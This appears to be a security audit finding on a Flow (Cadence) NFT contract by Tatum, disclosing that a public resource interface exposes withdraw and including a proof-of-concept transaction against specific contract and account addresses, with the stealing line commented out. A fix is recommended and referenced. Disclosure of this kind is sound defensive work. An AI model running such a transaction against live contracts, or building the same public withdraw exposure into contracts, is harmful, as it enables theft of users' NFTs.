// line 36
pub resource interface TatumMultiNftCollectionPublic {
pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT
In line 156
, the withdraw
functionality is exposed in the TatumMultiNftCollectionPublic
resource interface. Since the TatumMultiNftCollectionPublic
interface is used to expose certain functions inside the Collection
resource publicly, an attacker can steal all NFTs by borrowing the public capability situated under CollectionPublicPath
and calling the withdraw
function.
Below is an example transaction code that illustrates the attack.
import TatumMultiNFT from 0x354e6721564ccd2c
transaction() {
execute {
let account = getAccount(0xac3ac01b20852170)
let cap = account.getCapability<&{TatumMultiNFT.TatumMultiNftCollectionPublic}>(TatumMultiNFT.CollectionPublicPath).borrow()!
let availableNFTs = cap.getIDs()
for nft in availableNFTs {
// let res <- cap.withdraw(withdrawID: nft)
}
}
}
Consider removing the withdraw
functionality in line 36
.
fix vulnerability ยท tatumio/flow-contracts@ebf2cdd